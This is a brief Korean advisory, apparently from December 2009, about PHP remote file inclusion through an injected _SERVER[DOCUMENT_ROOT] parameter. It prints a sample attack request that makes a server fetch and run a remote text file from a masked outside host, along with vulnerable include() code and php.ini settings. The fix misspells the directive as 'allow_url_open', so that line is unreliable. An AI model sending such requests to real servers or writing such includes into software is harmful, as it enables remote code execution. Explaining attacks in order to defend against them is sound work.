지난 주 (2009년 12월 3째주)부터 $_SERVER[DOCUMENT_ROOT]를 이용한 PHP injection 공격이 유행하고 있습니다.
공격 패턴은
GET /a.php?_SERVER[DOCUMENT_ROOT]=http://www.****.**.kr//bbs/data/***/van1.txt?
취약한 코드
php.ini
allow_url_fopen = On
a.php 에
include($_SERVER[DOCUMENT_ROOT]."config.php");
와 같이 되어 있는 경우 위의 공격 코드가 성공하게 됩니다.
해결책
php.ini
allow_url_open = Off
유사하게
include($_GET['a'].'.php'); 같은 코드도 보안에 취약합니다. include 문을 사용할 때는 외부에서 값을 입력할 수 없도록 조치해야 합니다.
